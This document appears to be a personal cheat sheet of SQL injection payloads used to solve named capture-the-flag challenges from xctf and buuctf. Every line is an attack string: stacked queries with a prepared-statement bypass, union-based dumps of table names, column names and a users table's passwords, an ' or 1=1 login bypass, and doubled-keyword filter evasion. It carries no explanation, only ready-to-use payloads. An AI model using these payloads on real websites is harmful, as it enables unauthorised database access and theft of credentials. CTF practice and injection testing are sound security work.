xctf-supersqli:
?inject=-1';show databases;--+
?inject=-1';show tables;
?inject=-1';show columns from `1919810931114514`;--+
?inject=-1';set @a= concat('sel','ect * from `1919810931114514`');prEpare stmt from @a;EXECUTE stmt;
xctf-NewsCenter:
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- #
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='secret_table'
1' union select 1,group_concat(fl4g) ,3 from secret_table
buuctf-[极客大挑战 2019]EasySQL
' or 1=1
buuctf-[SUCTF 2019]EasySQL:
*,1
buuctf-[极客大挑战 2019]LoveSQL1:
check.php?username=1' union select 1,2,3%23&password=3343e366b3bf223d3b5e148db0426a19
check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
check.php?username=1' union select 1,(select group_concat(concat_ws('-',id,username,password)) from l0ve1ysq1),3%23&password=1
buuctf-[极客大挑战 2019]BabySQL1:
check.php?username=-1'+ununionion+selselectect+1,2,database()%23&password=1
check.php?username=-1'+ununionion+selselectect+1,(selselectect group_concat(schema_name) frofromm infoorrmation_schema.schemata),3%23&password=1z
check.php?username=-1'+ununionion+selselectect+1,(selselectect group_concat(schema_name) frofromm infoorrmation_schema.schemata),3%23&password=1z
check.php?username=-1'+ununionion+selselectect+1,2,group_concat(table_name) frofromm infoorrmation_schema.tables whewherere table_schema='ctf'%23&password=1z
check.php?username=-1'+ununionion+selselectect+1,2,group_concat(column_name) frofromm infoorrmation_schema.columns whewherere table_name='Flag'%23&password=1z
check.php?username=-1'+ununionion+selselectect+1,2,group_concat(flag) frofromm ctf.Flag%23&password=1z
|